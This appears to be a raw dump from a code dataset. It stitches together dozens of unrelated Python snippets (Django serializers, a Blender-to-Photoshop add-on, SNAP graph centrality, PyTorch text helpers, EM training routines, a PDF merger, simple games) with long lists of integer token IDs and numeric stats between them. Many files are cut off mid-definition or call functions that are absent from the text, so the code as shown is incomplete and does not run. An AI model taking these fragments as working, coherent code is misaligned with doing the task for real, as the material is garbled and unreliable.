1395,
1990,
83,
2898,
328,
10446,
20180,... | 3.647727 | 88 |
# Copyright (c) 2021, www.nestorbird.com and contributors
# For license information, please see license.txt
# import frappe
from frappe.model.document import Document
| [
2,
15069,
357,
66,
8,
33448,
11,
7324,
13,
77,
395,
273,
16944,
13,
785,
290,
20420,
198,
2,
1114,
5964,
1321,
11,
3387,
766,
5964,
13,
14116,
198,
198,
2,
1330,
5306,
27768,
198,
6738,
5306,
27768,
13,
19849,
13,
22897,
1330,
168... | 3.733333 | 45 |
"""Unit tests for network.py."""
# standard library
import unittest
from unittest.mock import MagicMock, sentinel, patch
from delphi.epidata.acquisition.covid_hosp.common.network import Network
import pandas as pd
# py3tester coverage target
__test_target__ = 'delphi.epidata.acquisition.covid_hosp.common.network'
| [
37811,
26453,
5254,
329,
3127,
13,
9078,
526,
15931,
198,
198,
2,
3210,
5888,
198,
11748,
555,
715,
395,
198,
6738,
555,
715,
395,
13,
76,
735,
1330,
6139,
44,
735,
11,
1908,
20538,
11,
8529,
198,
198,
6738,
1619,
34846,
13,
538,
... | 2.962963 | 108 |
from rest_framework import serializers
from rest_framework.serializers import ModelSerializer
from rest_framework.validators import UniqueValidator
from ..models.app import App, AppImage, Category
| [
6738,
1334,
62,
30604,
1330,
11389,
11341,
198,
6738,
1334,
62,
30604,
13,
46911,
11341,
1330,
9104,
32634,
7509,
198,
6738,
1334,
62,
30604,
13,
12102,
2024,
1330,
30015,
47139,
1352,
198,
198,
6738,
11485,
27530,
13,
1324,
1330,
2034,
... | 4.208333 | 48 |
import datetime
import logging
import os
import subprocess
import time
from threading import Thread
import GlobalConfig
from DataWriter import DataWriter
from FanCollector import FanCollector
from UPSCollector import UPSCollector
from SensorCollector import SensorCollector
# Log format: level name and message only (no timestamps).
LOG_FORMAT = "%(levelname)s - %(message)s"
logging.basicConfig(level=logging.DEBUG, format=LOG_FORMAT)
if (__name__ == "__main__"):
    # NOTE(review): LBCollector is not imported in this chunk (only
    # DataWriter, FanCollector, UPSCollector and SensorCollector are);
    # as written this raises NameError -- confirm against the full source.
    LBCollector().run()
11748,
4818,
8079,
198,
11748,
18931,
198,
11748,
28686,
198,
11748,
850,
14681,
198,
11748,
640,
198,
6738,
4704,
278,
1330,
14122,
198,
198,
11748,
8060,
16934,
198,
6738,
6060,
34379,
1330,
6060,
34379,
198,
6738,
13836,
31337,
273,
13... | 3.382813 | 128 |
# Blender add-on metadata (the "description" value is user-facing and is
# intentionally left in Japanese, as shipped).
bl_info = {
    "name": "3D Object to Photoshop",
    "description": "選択形状をPhotoshopの3Dレイヤに",
    "author": "Yukimi",
    "version": (0,4),
    "blender": (2, 6, 0),
    "location": "object",
    "warning": "",
    "wiki_url": "",
    "tracker_url": "http://yukimi-blend.blogspot.jp/",
    "category": "Import-Export"}
import bpy
from io_scene_obj import export_obj
from bpy_extras.io_utils import axis_conversion
import os
import subprocess
import time
import random
# name of the JavaScript file to run inside Photoshop
js_name = "Add3DLayerFromFile.jsx"
# path of the directory containing this script
mydoc_dir = os.path.dirname(__file__)
# absolute paths of the helper scripts to execute
VB_Hub = os.path.abspath(os.path.join(mydoc_dir, "VB_Hub.vbs"))
jscript = os.path.abspath(os.path.join(mydoc_dir, js_name))
# use Blender's temporary-file directory for the exported file
tmp_dir = bpy.context.user_preferences.filepaths.temporary_directory
# to write the exported file to the Desktop instead, uncomment the line below
#tmp_dir = os.path.join(os.getenv("HOMEDRIVE"), os.getenv("HOMEPATH") , "Desktop")
###################################################
class DupulicateActionAtCurrentTime(bpy.types.Operator):
    '''selected 3D Object to Photoshop 3D Layer'''
    # Blender operator metadata: internal id and UI label. (The "Dupulicate"
    # typo in the class name is kept -- renaming could break callers.)
    bl_idname = "action.obj_to_photoshop"
    bl_label = "3D Object to Photoshop 3D Layer"
    # menu construction logic
    # processing when the add-on is enabled
    # processing when the add-on is disabled
    # NOTE(review): the operator's method bodies appear to be elided from
    # this chunk; confirm against the full source.
if __name__ == "__main__":
    # NOTE(review): register() is not defined in this chunk -- presumably
    # one of the elided add-on registration functions referenced above.
    register()
########################################################## | [
2436,
62,
10951,
796,
1391,
201,
198,
220,
220,
220,
366,
3672,
1298,
366,
18,
35,
9515,
284,
29153,
1600,
201,
198,
220,
220,
220,
366,
11213,
1298,
366,
34402,
116,
162,
232,
252,
37605,
95,
163,
232,
114,
31758,
27248,
25444,
564... | 2.024854 | 684 |
import snap
# Random directed graph: 100 nodes, 1000 edges (G(n, m) style generator).
Graph = snap.GenRndGnm(snap.PNGraph, 100, 1000)
# Output hash tables: node id -> centrality, edge (src, dst) pair -> centrality.
Nodes = snap.TIntFltH()
Edges = snap.TIntPrFltH()
# Betweenness centrality; the final 1.0 is the node fraction used for the
# estimate (1.0 -> all nodes, exact) -- confirm against the SNAP docs.
snap.GetBetweennessCentr(Graph, Nodes, Edges, 1.0)
for node in Nodes:
    print("node: %d centrality: %f" % (node, Nodes[node]))
for edge in Edges:
    print("edge: (%d, %d) centrality: %f" % (edge.GetVal1(), edge.GetVal2(), Edges[edge]))
# Same computation on an undirected random graph.
UGraph = snap.GenRndGnm(snap.PUNGraph, 100, 1000)
Nodes = snap.TIntFltH()
Edges = snap.TIntPrFltH()
snap.GetBetweennessCentr(UGraph, Nodes, Edges, 1.0)
for node in Nodes:
    print("node: %d centrality: %f" % (node, Nodes[node]))
for edge in Edges:
    print("edge: (%d, %d) centrality: %f" % (edge.GetVal1(), edge.GetVal2(), Edges[edge]))
# Same computation on a directed network (TNEANet) of the same size.
Network = snap.GenRndGnm(snap.PNEANet, 100, 1000)
Nodes = snap.TIntFltH()
Edges = snap.TIntPrFltH()
snap.GetBetweennessCentr(Network, Nodes, Edges, 1.0)
for node in Nodes:
    print("node: %d centrality: %f" % (node, Nodes[node]))
for edge in Edges:
    print("edge: (%d, %d) centrality: %f" % (edge.GetVal1(), edge.GetVal2(), Edges[edge]))
| [
11748,
11495,
198,
198,
37065,
796,
11495,
13,
13746,
49,
358,
38,
21533,
7,
45380,
13,
47,
10503,
1470,
11,
1802,
11,
8576,
8,
198,
45,
4147,
796,
11495,
13,
51,
5317,
37,
2528,
39,
3419,
198,
7407,
3212,
796,
11495,
13,
51,
5317... | 2.2949 | 451 |
# Rock-Paper-Scissors: first to 3 points wins; play vs computer or a friend.
# NOTE(review): user(), computer() and check() are not defined in this chunk
# (presumably elided); check() appears to update the global scores us/cs --
# confirm against the full source.
import random

Choices = ['rock','paper','scissors']
cs = 0   # computer / second player score
us = 0   # user / first player score
u = 0    # current choice of user / first player
c = 0    # current choice of computer / second player
ctr = 0  # unused in this chunk; possibly used by the elided helpers

print("********************** Rock Paper Scissors **********************" )
print("                    Made by Keshav Dev Kapil                     ")

user1 = user(input("Enter name of user1: "))
print("Welcome to Rock, Paper Scissors. How do you want to play:\n1.{} Vs Computer\n2.{} Vs friend".format(user1.name,user1.name))
chs = int(input("enter choice(1 for computer, 2 for friend): "))

if chs == 1:
    # Mode 1: play against the computer.
    while(True):
        print("\nChoose your option:\nRock \nPaper \nScissors\n")
        u = input("Enter your choice: ").lower()
        c = computer()
        if u not in Choices:
            print("Enter valid choice!\n")
            continue
        else:
            print("User Choice: {} \t Computer Choice: {}".format(u,c))
            check(u,c)
            print("User score: {} \t \t Computer Score: {}".format(us,cs))
        if us == 3:
            print("\nCongratulations, You win!")
            break
        elif cs == 3:
            print("\nyou lost :(")
            break
        else:
            continue
elif chs == 2:
    # Mode 2: two human players.
    # BUG FIX: prompt read "Entee name of user2: ".
    user2 = user(input("Enter name of user2: "))
    while(True):
        print("\nChoose your option:\nRock \nPaper \nScissors\n")
        u = input("Enter your choice, {}: ".format(user1.name)).lower()
        c = input("Enter your choice, {}: ".format(user2.name)).lower()
        if u not in Choices or c not in Choices:
            print("Enter valid choice!\n")
            continue
        else:
            print("{}: {} \t {}: {}".format(user1.name,u,user2.name,c))
            check(u,c)
            print("{}: {} \t {}: {}".format(user1.name,us,user2.name,cs))
        if us == 3:
            print("\nCongratulations, {} win this game!!!\n{} lost :(".format(user1.name,user2.name))
            break
        elif cs == 3:
            print("\nCongratulations, {} win this game!!!\n{} lost :(".format(user2.name,user1.name))
            break
        else:
            continue
| [
11748,
4738,
201,
198,
201,
198,
22164,
1063,
796,
37250,
10823,
41707,
20189,
41707,
1416,
32555,
20520,
201,
198,
6359,
796,
657,
201,
198,
385,
796,
657,
201,
198,
84,
796,
657,
201,
198,
66,
796,
657,
201,
198,
24087,
796,
657,
... | 1.927574 | 1,146 |
import os
import smtplib
import imghdr
from email.message import EmailMessage
import yfinance as yf
import datetime as dt
import pandas as pd
from pandas_datareader import data as pdr
EMAIL_ADDRESS = os.environ.get('EMAIL_USER')
EMAIL_PASSWORD = os.environ.get('EMAIL_PASS')
| [
11748,
28686,
198,
11748,
895,
83,
489,
571,
198,
11748,
545,
456,
7109,
198,
6738,
3053,
13,
20500,
1330,
9570,
12837,
198,
198,
11748,
331,
69,
14149,
355,
331,
69,
198,
11748,
4818,
8079,
355,
288,
83,
198,
11748,
19798,
292,
355,
... | 2.808081 | 99 |
import time
from collections import Counter
from functools import partial
import csv
import json
import torch
from torch import nn
from torch.utils.data import DataLoader
from torch.utils.data.dataset import random_split
from torchtext.vocab import Vocab
from gensim.scripts.glove2word2vec import glove2word2vec
import gensim
from pathlib import Path
def process_to_pytorch(file_path, max_lines):
    """Read a TSV file into a list of (label, tokens) samples.

    Each row is expected to look like ``label<TAB>sentence``; label "2" maps
    to class 1 and every other label to class 0, and the sentence is
    lowercased and split on single spaces.

    :param file_path: path to the TSV file.
    :param max_lines: maximum number of rows to read.
    :return: list of ``(label_index, token_list)`` tuples.
    """
    samples = []
    # `with` guarantees the handle is closed even if parsing fails
    # (the original left the file open on error).
    with open(file_path) as tsv_file:
        for row in csv.reader(tsv_file, delimiter="\t"):
            if len(samples) >= max_lines:
                # The original kept scanning the rest of the file while doing
                # nothing; stop as soon as enough rows have been read.
                break
            label = 1 if row[0] == "2" else 0
            samples.append((label, [word.lower() for word in row[1].split(" ")]))
    return samples
def read_params(json_file_path):
    """Load run parameters (e.g. number of epochs) from a JSON file.

    :param json_file_path: path to the JSON parameter file.
    :return: dict of all parameters.
    """
    with open(json_file_path, 'r') as params_file:
        return json.load(params_file)
def vocab_counter(train_dataset):
    """Build the vocabulary over every token in the training dataset.

    :param train_dataset: iterable of ``(label, tokens)`` pairs.
    :return: tuple of (Vocab instance, vocabulary size).
    """
    token_counts = Counter()
    for _, tokens in train_dataset:
        token_counts.update(tokens)
    vocab = Vocab(token_counts)
    return vocab, len(vocab)
def unique_label(train_dataset):
    """Collect the distinct labels present in the training dataset.

    :param train_dataset: iterable of ``(label, tokens)`` pairs.
    :return: tuple of (set of unique labels, number of unique labels).
    """
    labels = {label for label, _ in train_dataset}
    return labels, len(labels)
def collate_batch(batch, vocab, device):
    """Turn a batch of (label, tokens) pairs into EmbeddingBag-style tensors.

    :param batch: iterable of ``(label, tokens)`` pairs.
    :param vocab: mapping from token string to integer index.
    :param device: torch device for the returned tensors.
    :return: (labels, flat token indices, per-sample offsets) long tensors.
    """
    labels = []
    token_chunks = []
    offsets = []
    cursor = 0  # running position of the next sample in the flat tensor
    for label, tokens in batch:
        labels.append(label)
        offsets.append(cursor)
        cursor += len(tokens)
        indices = [vocab[tok] for tok in tokens]
        token_chunks.append(torch.tensor(indices, dtype=torch.long))
    labels_tensor = torch.tensor(labels, dtype=torch.long, device=device)
    tokens_tensor = torch.cat(token_chunks).to(device)
    offsets_tensor = torch.tensor(offsets, dtype=torch.long, device=device)
    return labels_tensor, tokens_tensor, offsets_tensor
if __name__ == '__main__':
main()
| [
11748,
640,
198,
6738,
17268,
1330,
15034,
198,
6738,
1257,
310,
10141,
1330,
13027,
198,
198,
11748,
269,
21370,
198,
11748,
33918,
198,
11748,
28034,
198,
6738,
28034,
1330,
299,
77,
198,
6738,
28034,
13,
26791,
13,
7890,
1330,
6060,
... | 2.561024 | 1,016 |
"""
"""
import os, sys
import argparse
import numpy as np
from signal_processing.ecg_preproc import preprocess_signal, parallel_preprocess_signal
from signal_processing.ecg_features import compute_ecg_features
from models.load_model import load_model
from models.train_model_ml import train as train_ml
from models.train_model_dl import train as train_dl
def main(**kwargs):
    """Entry point for the CPSC2020 pipeline (train or inference).

    :param kwargs: parsed command-line options (``mode``, ``verbose``).
    :raises NotImplementedError: always -- the pipeline is not wired up yet.
    """
    raise NotImplementedError
if __name__ == "__main__":
    # Command-line front end: collects options and forwards them to main().
    ap = argparse.ArgumentParser(
        description="CPSC2020 extra configs",
    )
    ap.add_argument(
        "-m", "--mode",
        type=str, required=True,
        help="running mode, train or inference",
        dest="mode",
    )
    ap.add_argument(
        "-v", "--verbose",
        type=int, default=0,
        help="set verbosity",
        dest="verbose",
    )
    # vars() turns the Namespace into a plain dict for main(**kwargs).
    kwargs = vars(ap.parse_args())
    print("passed arguments:")
    print(repr(kwargs))
    main(**kwargs)
| [
37811,
198,
37811,
198,
11748,
28686,
11,
25064,
198,
11748,
1822,
29572,
198,
11748,
299,
32152,
355,
45941,
198,
198,
6738,
6737,
62,
36948,
13,
721,
70,
62,
3866,
36942,
1330,
662,
14681,
62,
12683,
282,
11,
10730,
62,
3866,
14681,
... | 2.477573 | 379 |
"""Helper functions for training models.
Several of the functions below implement approximate maximum likelihood
estimation by optimizing the scaled log likelihood. The scale factor used in
these cases is the reciprocal of the "count" for the given dist, unless this
count is less than 1.0, in which case the scale factor used is 1.0. The scale
factor is included to make the logging output produced during optimization more
intuitively comprehensible. The inclusion of the scale factor typically has
little or no impact on the minimization itself.
The special-casing for small counts is necessary since the count may be zero
even when the training set is non-empty (e.g. for autoregressive sequence
distributions where the count is the number of frames rather than the
occupancy). Special-cased values are used only internally and for logging output
in the functions below, and are not part of their return values.
"""
# Copyright 2011, 2012, 2013, 2014, 2015 Matt Shannon
# This file is part of armspeech.
# See `License` for details of license and warranty.
from codedep import codeDeps
from armspeech.util.timing import timed
from armspeech.modelling import nodetree
import armspeech.modelling.dist as d
from armspeech.modelling.minimize import minimize
@codeDeps(d.Rat, d.getDefaultCreateAcc, d.getDefaultEstimateTotAux)
def expectationMaximization(distPrev, accumulate, createAcc = d.getDefaultCreateAcc(), estimateTotAux = d.getDefaultEstimateTotAux(), afterAcc = None, monotoneAux = True, verbosity = 0):
    """Performs one step of expectation maximization.
    See the note in the docstring for this module for information on how the
    log likelihood is scaled. This scaling has no effect on the dist returned
    by this function.
    """
    # E-step: accumulate sufficient statistics for the previous dist.
    acc = createAcc(distPrev)
    accumulate(acc)
    if afterAcc is not None:
        afterAcc(acc)
    logLikePrev = acc.logLike()
    count = acc.count()
    # Special-case small counts (see module docstring): the clamped value is
    # used for the scaled logging output below and is also returned.
    count = max(count, 1.0)
    # M-step: re-estimate the dist together with its auxiliary value.
    dist, (aux, auxRat) = estimateTotAux(acc)
    # For a true EM update the auxiliary value must not fall below the
    # previous log likelihood; treat a decrease as an error when requested.
    if monotoneAux and aux < logLikePrev:
        raise RuntimeError('re-estimated auxiliary value (%s) less than previous log likelihood (%s) during expectation-maximization (count = %s)' % (aux / count, logLikePrev / count, count))
    if verbosity >= 2:
        # (Python 2 print statement -- this module predates Python 3.)
        print 'trainEM: logLikePrev = %s -> aux = %s (%s) (%s count)' % (logLikePrev / count, aux / count, d.Rat.toString(auxRat), count)
    return dist, logLikePrev, (aux, auxRat), count
@codeDeps(d.getDefaultCreateAcc, d.getDefaultEstimateTotAux,
    expectationMaximization
)
def trainEM(distInit, accumulate, createAcc = d.getDefaultCreateAcc(), estimateTotAux = d.getDefaultEstimateTotAux(), logLikePrevInit = float('-inf'), deltaThresh = 1e-8, minIterations = 1, maxIterations = None, beforeAcc = None, afterAcc = None, afterEst = None, monotone = False, monotoneAux = True, verbosity = 0):
    """Re-estimates a distribution using expectation maximization.
    See the note in the docstring for this module for information on how the
    log likelihood is scaled. This scaling only affects the dist returned by
    this function to the extent that it effectively scales the deltaThresh
    threshold used to assess convergence, and so may sometimes affect the number
    of iterations of expectation maximization performed.
    """
    assert minIterations >= 1
    assert maxIterations is None or maxIterations >= minIterations
    dist = distInit
    logLikePrev = logLikePrevInit
    it = 0
    converged = False
    # `or` binds looser than `and`, so this reads: (it < minIterations) or
    # ((not converged) and (maxIterations is None or it < maxIterations)).
    while it < minIterations or (not converged) and (maxIterations is None or it < maxIterations):
        if beforeAcc is not None:
            beforeAcc(dist)
        logLikePrevPrev = logLikePrev
        if verbosity >= 2:
            # (Python 2 print statements throughout this module.)
            print 'trainEM: it %s:' % (it + 1)
        dist, logLikePrev, (aux, auxRat), count = expectationMaximization(dist, accumulate, createAcc = createAcc, estimateTotAux = estimateTotAux, afterAcc = afterAcc, monotoneAux = monotoneAux, verbosity = verbosity)
        # Improvement of the log likelihood over the previous iteration.
        deltaLogLikePrev = logLikePrev - logLikePrevPrev
        if monotone and deltaLogLikePrev < 0.0:
            raise RuntimeError('log likelihood decreased during expectation-maximization')
        if verbosity >= 2:
            print 'trainEM: deltaLogLikePrev = %s' % (deltaLogLikePrev / count)
        if afterEst is not None:
            afterEst(dist = dist, it = it)
        # Convergence test uses the count-scaled delta (see module docstring).
        converged = (abs(deltaLogLikePrev) <= deltaThresh * count)
        it += 1
    if verbosity >= 1:
        if converged:
            print 'trainEM: converged at thresh', deltaThresh, 'in', it, 'iterations'
        else:
            print 'trainEM: did NOT converge at thresh', deltaThresh, 'in', it, 'iterations'
    return dist
# FIXME : try alternative minimizers (e.g. LBFGS, minFunc)
@codeDeps(d.getDefaultParamSpec, minimize)
def trainCG(distInit, accumulate, ps = d.getDefaultParamSpec(), length = -50, verbosity = 0):
    """Re-estimates a distribution using a conjugate gradient optimizer.
    See the note in the docstring for this module for information on how the
    log likelihood is scaled. This scaling is presumed to have only a small
    impact on the dist returned by this function.
    """
    # (FIXME : investigate how large the effect of the scale factor is for
    #   a few example dists?)
    params = ps.params(distInit)
    # NOTE(review): negLogLike_derivParams is not defined in this excerpt;
    # presumably a closure over (accumulate, ps, distInit) returning
    # (negative log likelihood, derivative wrt params) was elided -- confirm
    # against the full source.
    if verbosity >= 2:
        print 'trainCG: initial params =', params
        print 'trainCG: initial derivParams =', -negLogLike_derivParams(params)[1]
    # Minimize the negative (scaled) log likelihood; negative `length` bounds
    # the number of function evaluations (see minimize's conventions).
    params, negLogLikes, lengthUsed = minimize(negLogLike_derivParams, params, length = length, verbosity = verbosity)
    if verbosity >= 3:
        print 'trainCG: logLikes =', map(lambda x: -x, negLogLikes)
    if verbosity >= 2:
        print 'trainCG: final params =', params
        print 'trainCG: final derivParams =', -negLogLike_derivParams(params)[1]
    if verbosity >= 1:
        print 'trainCG: logLike %s -> %s (delta = %s)' % (-negLogLikes[0], -negLogLikes[-1], negLogLikes[0] - negLogLikes[-1])
        print 'trainCG: (used', lengthUsed, 'function evaluations)'
    # Rebuild a dist of the same structure from the optimized parameters.
    dist = ps.parseAll(distInit, params)
    return dist
@codeDeps(d.getDefaultCreateAcc, d.getDefaultEstimateTotAux,
    d.getDefaultParamSpec, expectationMaximization, timed, trainCG
)
def trainCGandEM(distInit, accumulate, ps = d.getDefaultParamSpec(), createAccEM = d.getDefaultCreateAcc(), estimateTotAux = d.getDefaultEstimateTotAux(), iterations = 5, length = -50, afterEst = None, verbosity = 0):
    """Re-estimates a distribution using conjugate gradients and EM.
    See the note in the docstring for this module for information on how the
    log likelihood is scaled. This scaling is presumed to have only a small
    impact on the dist returned by this function (via its impact on trainCG).
    """
    assert iterations >= 1
    dist = distInit
    for it in range(1, iterations + 1):
        if verbosity >= 1:
            # (Python 2 print statements throughout this module.)
            print 'trainCGandEM: starting it =', it, 'of CG and EM'
        # Gradient-based update first (wrapped in timing at verbosity >= 2)...
        dist = (timed(trainCG) if verbosity >= 2 else trainCG)(dist, accumulate, ps = ps, length = length, verbosity = verbosity)
        # ...then one EM step; only the re-estimated dist is kept.
        dist, _, _, _ = expectationMaximization(dist, accumulate, createAcc = createAccEM, estimateTotAux = estimateTotAux, verbosity = verbosity)
        if afterEst is not None:
            afterEst(dist = dist, it = it)
        if verbosity >= 1:
            print 'trainCGandEM: finished it =', it, 'of CG and EM'
    if verbosity >= 1:
        print 'trainCGandEM:'
    return dist
@codeDeps(d.LinearGaussianAcc, d.estimateInitialMixtureOfTwoExperts)
| [
37811,
47429,
5499,
329,
3047,
4981,
13,
198,
198,
14945,
286,
262,
5499,
2174,
3494,
27665,
5415,
14955,
198,
395,
18991,
416,
45780,
262,
27464,
2604,
14955,
13,
383,
5046,
5766,
973,
287,
198,
27218,
2663,
318,
262,
48135,
286,
262,
... | 2.987684 | 2,517 |
import tempfile
import shutil
from unittest import TestCase
from unittest import mock
from lineflow import download
from lineflow.datasets.wmt14 import Wmt14, get_wmt14
| [
11748,
20218,
7753,
198,
11748,
4423,
346,
198,
6738,
555,
715,
395,
1330,
6208,
20448,
198,
6738,
555,
715,
395,
1330,
15290,
198,
198,
6738,
1627,
11125,
1330,
4321,
198,
6738,
1627,
11125,
13,
19608,
292,
1039,
13,
86,
16762,
1415,
... | 3.288462 | 52 |
from django.urls import path
from . import consumers
app_name = 'chat'
# Websocket route: one chat thread per integer thread_id.
# NOTE(review): Django Channels conventionally names this list
# `websocket_urlpatterns`; confirm the ProtocolTypeRouter actually imports
# `url_patterns` from this module.
url_patterns = [
    path('thread/<int:thread_id>/', consumers.ChatConsumer.as_asgi())
]
| [
6738,
42625,
14208,
13,
6371,
82,
1330,
3108,
198,
198,
6738,
764,
1330,
7008,
628,
198,
1324,
62,
3672,
796,
705,
17006,
6,
198,
198,
6371,
62,
33279,
82,
796,
685,
198,
220,
220,
3108,
10786,
16663,
14,
27,
600,
25,
16663,
62,
3... | 2.716667 | 60 |
#!/usr/bin/python
# Merges per-company chart pdfs into a single ordered pdf: first all
# non-ticker pdfs, then one pdf per ticker in the sort order below.
print('merging pdfs for filtered companies')
import os
import pandas as pd
import sys
from PyPDF2 import PdfFileMerger, PdfFileReader
from pathlib import Path
pd.options.mode.chained_assignment = None  # default='warn'
pd.options.mode.use_inf_as_na = True
# set directories and files
cwd = os.getcwd()
input_folder = "0_input"
output_folder = "0_output"
charts_folder = "5_charts"
# tickers processed - 5_df_output_unflitered.xlsx, properly sorting them
five_df_output_unflitered = pd.read_excel(os.path.join(cwd,"5_df_output_unflitered.xlsx"), index_col=None)
five_df_output_unflitered = five_df_output_unflitered.sort_values(['country','industry','EV'], ascending=[True, True, False])
df_symbols = five_df_output_unflitered['symbol'].drop_duplicates().reset_index(drop=False).drop(columns='index')
# Create a new PdfFileWriter object which represents a blank PDF document
merger = PdfFileMerger()
# https://stackoverflow.com/questions/17104926/pypdf-merging-multiple-pdf-files-into-one-pdf
# Loop through pdfs and append them to each other
# first loop through non-stock pdfs
paths = Path(os.path.join(cwd,input_folder,charts_folder)).glob('**/*.pdf')
for path in paths:
    try:
        # Derive the chart name: path relative to the charts folder with the
        # extension stripped. NOTE(review): the '\\' split assumes Windows
        # path separators -- confirm this only runs on Windows.
        path_in_str = str(path)
        path_to_folder_only = os.path.join(cwd,input_folder,charts_folder)
        name_path_reduced_one = path_in_str.replace(path_to_folder_only, '')
        name_path_reduced_two = name_path_reduced_one.replace('.pdf', '')
        name_df = name_path_reduced_two.split('\\')
        pdf_name = name_df[1]
        # Only non-ticker pdfs in this pass; ticker pdfs are appended below.
        if pdf_name not in df_symbols.values:
            try:
                merger.append(PdfFileReader(open(path_in_str, 'rb')))
            except:
                # NOTE(review): bare except silently skips unreadable pdfs
                # (and hides any other error); consider logging the failure.
                pass
    except:
        # NOTE(review): bare except also swallows name-parsing errors (e.g.
        # a file with no '\\' component raising IndexError above).
        pass
# now loop only through stocks and in a very specific order
for s in df_symbols['symbol']:
    # Re-create the generator each pass -- a glob generator is exhausted
    # after one full iteration.
    paths = Path(os.path.join(cwd,input_folder,charts_folder)).glob('**/*.pdf')
    #print(s)
    for path in paths:
        path_in_str = str(path)
        path_to_folder_only = os.path.join(cwd,input_folder,charts_folder)
        name_path_reduced_one = path_in_str.replace(path_to_folder_only, '')
        name_path_reduced_two = name_path_reduced_one.replace('.pdf', '')
        name_df = name_path_reduced_two.split('\\')
        pdf_name = name_df[1]
        if str(pdf_name) == str(s):
            print(pdf_name)
            merger.append(PdfFileReader(open(path_in_str, 'rb')))
            #print(path_in_str)
#save to one large pdf
Charts = '5_Charts.pdf'
merger.write(os.path.join(cwd,Charts))
| [
2,
48443,
14629,
14,
8800,
14,
29412,
198,
4798,
10786,
647,
2667,
37124,
82,
329,
29083,
2706,
11537,
198,
198,
11748,
28686,
198,
11748,
19798,
292,
355,
279,
67,
198,
11748,
25064,
198,
6738,
9485,
20456,
17,
1330,
350,
7568,
8979,
... | 2.338235 | 1,088 |
"""
Tests of the transforms
"""
import pytest
from limnos.types import Route
from limnos.transforms import (bender,
flipper,
flattener,
Chirality)
two_point_routes = [[(1, 1), (3, 1)],
[(1, 1), (1, 3)],
[(1, 1), (-1, 1)],
[(1, 1), (1, -1)],
[(11, 5), (11, 3)]]
three_point_routes = [[(1, 1), (1, 3), (3, 3)],
[(1, 1), (1, 3), (-1, 3)],
[(1, 1), (3, 1), (3, 3)],
[(1, 1), (3, 1), (3, -1)],
[(1, 1), (1, -1), (3, -1)],
[(1, 1), (1, -1), (-1, -1)],
[(1, 1), (-1, 1), (-1, 3)],
[(1, 1), (-1, 1), (-1, -1)],
[(7, 9), (7, 11), (9, 11)]
]
@pytest.mark.parametrize("route", three_point_routes)
@pytest.mark.parametrize("chirality", (Chirality.RIGHT, Chirality.LEFT))
@pytest.mark.parametrize("route", two_point_routes)
| [
37811,
198,
51,
3558,
286,
262,
31408,
198,
37811,
198,
11748,
12972,
9288,
198,
198,
6738,
1761,
39369,
13,
19199,
1330,
18956,
198,
6738,
1761,
39369,
13,
7645,
23914,
1330,
357,
45666,
11,
198,
220,
220,
220,
220,
220,
220,
220,
22... | 1.511111 | 720 |
import threading
from funcy import cached_property, wrap_prop
from dvc.scheme import Schemes
# pylint:disable=abstract-method
from .base import ObjectFileSystem
| [
11748,
4704,
278,
198,
198,
6738,
1257,
948,
1330,
39986,
62,
26745,
11,
14441,
62,
22930,
198,
198,
6738,
288,
28435,
13,
15952,
1326,
1330,
1446,
4411,
274,
198,
198,
2,
279,
2645,
600,
25,
40223,
28,
397,
8709,
12,
24396,
198,
67... | 3.3 | 50 |
# Copyright (c) 2017 Jonathan Bassen, Stanford University
import os
import tornado.escape as escape
import tornado.gen as gen
import tornado.httputil as httputil
import tornado.web as web
import urllib
from db import upsert_activity_data
@gen.coroutine
| [
2,
15069,
357,
66,
8,
2177,
11232,
19829,
268,
11,
13863,
2059,
198,
198,
11748,
28686,
198,
11748,
33718,
13,
41915,
355,
6654,
198,
11748,
33718,
13,
5235,
355,
2429,
198,
11748,
33718,
13,
2804,
1996,
346,
355,
1841,
1996,
346,
198... | 3.547945 | 73 |
import tensorflow as tf
tf.compat.v1.logging.set_verbosity(tf.compat.v1.logging.ERROR)
from core.generator import Generator
from core.discriminator import Discriminator
from core.gan import GAN
import pickle
import argparse
# Command-line options for testing.
parser = argparse.ArgumentParser(description='Testing')
parser.add_argument('--word_to_idx_dir', type=str, required=True)
parser.add_argument('--image', type=str, required=True)
parser.add_argument('--max_length', type=int, default=25)
parser.add_argument('--load_model_dir', type=str, required=True)
# NOTE(review): argument parsing happens at import time (outside the
# __main__ guard), and main() is not defined in this chunk -- confirm
# against the full source.
args = parser.parse_args()
if __name__ == "__main__":
    main()
11748,
11192,
273,
11125,
355,
48700,
198,
27110,
13,
5589,
265,
13,
85,
16,
13,
6404,
2667,
13,
2617,
62,
19011,
16579,
7,
27110,
13,
5589,
265,
13,
85,
16,
13,
6404,
2667,
13,
24908,
8,
198,
6738,
4755,
13,
8612,
1352,
1330,
359... | 2.955446 | 202 |
#!/usr/bin/env python3
#! -*-conding:utf-8 -*-
#!@Time :2018/4/11 17:14
#!@Author :@liuweqia
#!@File :class.py
import pygame,random
from pygame.locals import *
from pygame import Rect
| [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
18,
198,
2,
0,
532,
9,
12,
17561,
278,
25,
40477,
12,
23,
532,
9,
12,
198,
198,
2,
0,
31,
7575,
220,
220,
1058,
7908,
14,
19,
14,
1157,
1596,
25,
1415,
198,
2,
0,
31,
13838,
1058,... | 2.181818 | 88 |
from rest_framework import serializers
from hyper_resource.serializers import BusinessSerializer
from scrum.models import *
from rest_framework_gis.serializers import GeoFeatureModelSerializer
from rest_framework.serializers import ModelSerializer, HyperlinkedRelatedField
| [
6738,
1334,
62,
30604,
1330,
11389,
11341,
201,
198,
201,
198,
6738,
8718,
62,
31092,
13,
46911,
11341,
1330,
7320,
32634,
7509,
201,
198,
6738,
6040,
388,
13,
27530,
1330,
1635,
201,
198,
6738,
1334,
62,
30604,
62,
70,
271,
13,
46911... | 3.542169 | 83 |
# used to change marker on players turn
# Sets up initital empty grid
grid = [
    [" ", " ", " "],
    [" ", " ", " "],
    [" ", " ", " "]
]
# Accepted coordinate inputs (1-based, as strings).
valid = ["1", "2", "3"]
numbers = ["0", "1", "2", "3", "4", "5", "6", "7", "8", "9"]
# Error messages for coordinate validation, keyed by error code.
coordinates_states = {
    0: "You should enter numbers!",
    1: "Coordinates should be from 1 to 3!",
    2: "This cell is occupied! Choose another one!"
}
# Possible game outcomes, keyed by state code.
game_states = {
    0: "Game not finished",
    1: "Draw",
    2: "X wins",
    3: "O wins",
    4: "Impossible",
}
# NOTE(review): these rows copy the *current* (empty) string values, not
# references -- strings are immutable, so win_combos will not reflect moves
# made later unless it is rebuilt after each move; confirm the elided
# helpers (print_board/make_move) rebuild or re-evaluate it.
win_combos = [[grid[0][0], grid[0][1], grid[0][2]],
